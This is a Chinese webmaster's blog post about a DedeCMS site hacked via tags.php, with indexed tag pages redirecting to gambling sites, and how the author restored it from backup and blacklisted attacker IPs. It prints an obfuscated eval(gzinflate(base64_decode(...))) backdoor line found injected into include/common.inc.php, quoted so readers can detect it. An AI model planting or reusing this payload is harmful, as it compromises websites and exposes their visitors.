记一次网站被黑的经历,dedecms织梦漏洞tags.php被黑客利用解决过程

987seo/2020-09-30/ 分类:心得日志/阅读:
今天早上,一如既往的通过百度查询下网址最近一天的收录情况,site后,筛选了最近一天,发现突然出现了2个tag标签页的收录,而且点击直接被跳转到博彩网站中去了,可以肯定的是这个是被黑了,黑首页的见多了,黑tag标签的还是第一见,而且在后台的tag标签中 ...
   今天早上,一如既往的通过百度查询下网址最近一天的收录情况,site后,筛选了最近一天,发现突然出现了2个tag标签页的收录,而且点击直接被跳转到博彩网站中去了,可以肯定的是这个是被黑了,黑首页的见多了,黑tag标签的还是第一见,而且在后台的tag标签中并未找到,这就比较头痛了

于是先想着把木马文件找出删掉后,看下情况,通过工作找到了2个木马文件,删除后,重新打开百度,点击链接还是可以打开!

  如果你网站出现了类似的情况,你看一下include/common.inc.php这个文件,是否出现了下图的那段代码


//特殊全局变量eval_r(gzinflate(base64_decode("dVJda4MwFH1W8D8EEVTolDLYQ0the3DbwxjDdXsZQ1KNNmCNJHFtKfvvuzF+tG4LQW6u556be06cbJ80gvAEF6SSaIXsKzsQkktWsj3hnpO8RvF7FH+4j+v1S/IGp+TuIXpeu5/+0jIdKBc1zQiHUsw5PnruBtOscWduwVhREggEK5hK7EQF3yNrMszatGBuT0LFQJPjUhBI54wTnG69sx5YIOfLP1kmgkVz5CG4as1EixnHmAEI9TC1Jh0kb1QD9efbMmErqkuMBvkngIw053QZlni+ymlJkoLIJGWVhM7Cs7dS1oswlIcAs8385jpI2S5smjAL5EHaal7D6An+qh/IOyw5UOn1SX/5+zbdgjEICHcaElOk4uAkh/lv/zc4ju6jOIq1u8ZYKCb+qqk6D4cQXO5i7XF30O8gSCHc0Kpos5r9wuHRXMOYWgvXHjw1tHwNL9Vr7dU+F1uqo6jtVj5jSzA46tlPLMWSsmqB7KAj0AK3CrcRSGjoB2GZPw==")));

这段代码。如果有出现的话,说明你的网站已经被黑了。

我的网站是没有找到这段,那么黑客应该是放在其他文件中了,那么我就不找了,如果你的有,删掉这段还有删掉木马文件即可!



我的操作就是直接把include文件夹整个删掉,然后把备份的include整个放到文件夹中就可以,现在再打开百度site域名点击链接,就会提示tag标签不存在了!你如果没有备份include就要好好找找黑客把代码放哪个文件夹里了



处理好后,剩下的就是把木马文件生成时间时间段的访客中,把一句话php木马请求,畸形文件访问请求等等恶意请求的ip我通通加入黑名单

总的来说,织梦防护措施不论做得多好,还是有黑客会有新的方法去黑你的网站,以其辛苦想着如何防范,不如就定时备份网站,他们爱怎么黑怎么黑,我随时可以把整台服务器都重置了再装,你要觉得这样黑我的站对得起你的精力的话,就随意来吧,你黑我的站应该几分钟搞不定吧,反正我就几分钟的事!

所以备份网站,备份数据库才是最有效防范黑客的方法哈~希望我的经历对正在经历被黑的站长有帮助哦!
阅读:
扩展阅读:
精彩评论:
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!
腾讯云服务器优惠
腾讯云服务器-全球

热门文章

HOT NEWS
  • 周榜
  • 月榜
阿里云服务器优惠券
987seo网络工作室 - 关注SEOer,站长和创业者的网站
微信二维码扫一扫
关注微信公众号
987studio.com 联系QQ:256707691 邮箱:256707691@qq.com Copyright © 20120-2029 987seo网络工作室 版权所有 闽ICP备18029221号-1
987SEO工作室专注seo教程分享,seo技术,网站关键词排名优化,dedecms织梦模板建站教程,技术分享等知识资讯,关键词上百度首页的方法及网站建设相关软件资源下载!一个关注SEOer、站长和创业者的网站
二维码
意见反馈 扫码关注987seo网络工作室官方公众号